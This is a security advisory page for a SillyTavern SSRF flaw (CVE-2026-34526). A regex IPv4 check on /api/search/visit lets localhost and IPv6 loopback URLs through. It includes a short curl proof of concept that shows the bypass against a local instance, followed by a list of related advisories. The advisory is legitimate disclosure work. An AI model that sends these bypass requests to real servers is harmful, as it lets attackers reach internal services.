Skip to content
sillytavernGHSA-wm7j-m6jm-8797

SillyTavern: Incomplete IP validation in /api/search/visit allows SSRF via localhost and IPv6

Medium5.0CVE-2026-34526 · Published Apr 1, 2026 · updated Apr 6, 2026

GitHub advisory

Affected versions

PackageAffectedFixed in
sillytavern
npm
< 1.17.01.17.0
Details and references

### Details Distinct from CVE-2025-59159 and CVE-2026-26286 (all fixed in v1.16.0). This endpoint is still unpatched. In `src/endpoints/search.js` line 419, the hostname is checked against `/^\d+\.\d+\.\d+\.\d+$/`. This only matches literal dotted-quad IPv4 (e.g. `127.0.0.1`, `10.0.0.1`). It does not catch: - `localhost` (hostname, not dotted-quad) - `[::1]` (IPv6 loopback) - DNS names resolving to internal addresses (e.g. `localtest.me` -> 127.0.0.1) A separate port check (`urlObj.port !== ''`) limits exploitation to services on default ports (80/443), making this lower severity than a fully unrestricted SSRF. ### PoC 1. Start SillyTavern v1.16.0 normally 2. Send requests to compare blocked vs bypassed (requires a valid session cookie or CSRF disabled): ```bash # Blocked , dotted-quad matched by regex curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \ -H "Content-Type: application/json" \ -d '{"url": "http://127.0.0.1/", "html": true}' # Returns: 400 (blocked) # Bypassed , "localhost" is not dotted-quad curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \ -H "Content-Type: application/json" \ -d '{"url": "http://localhost/", "html": true}' # Returns: 500 (passed validation, fetch attempted, ECONNREFUSED because nothing on port 80) # Bypassed , IPv6 loopback is not dotted-quad curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \ -H "Content-Type: application/json" \ -d '{"url": "http://[::1]/", "html": true}' # Returns: 500 (passed validation, fetch attempted) ``` The 400 vs 500 difference confirms `localhost` and `[::1]` pass the IP check. The 500 is ECONNREFUSED (nothing listening on port 80), not a validation rejection. ### Impact Server-side request forgery with partial restrictions. An authenticated user can force the server to fetch from internal hosts on default ports (80/443) using hostnames or IPv6 addresses that bypass the IP check. The full response body is returned. Lower severity than a fully unrestricted SSRF due to the port limitation. ## Resolution The issue was addressed in version 1.17.0 by improving IPv6 address validation

CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Severity from
GitHub (reviewed advisory)
Weakness
CWE-918
Also known as
CVE-2026-34526

More sillytavern advisories

All
DateAdvisory
Apr 1SillyTavern has a path traversal in `/api/chats/import` allows arbitrary file write outside intended chat directory
CVE-2026-34522High8.1fixed in 1.17.0
Apr 1SillyTavern: Path Traversal allows file existence oracle
CVE-2026-34523Medium5.3fixed in 1.17.0
Apr 1SillyTavern: Path Traversal in `/api/chats/export` and `/api/chats/delete` allows arbitrary file read/delete within user data root
CVE-2026-34524High8.3fixed in 1.17.0
May 12SillyTavern: Existing sessions are not invalidated after password change, allowing session reuse and account takeover
CVE-2026-44648High7.5fixed in 1.18.0
May 12SillyTavern has Authentication Bypass via SSO Header Injection
CVE-2026-44649Critical9.8fixed in 1.18.0
May 12SillyTavern has a Path Traversal issue
CVE-2026-44650Critical9.1fixed in 1.18.0

Critical advisories by email

Wednesdays: the week’s critical and high advisories in the AI and data stack, with the fixed versions. Only in weeks that have some.

Double opt-in. Unsubscribe any time.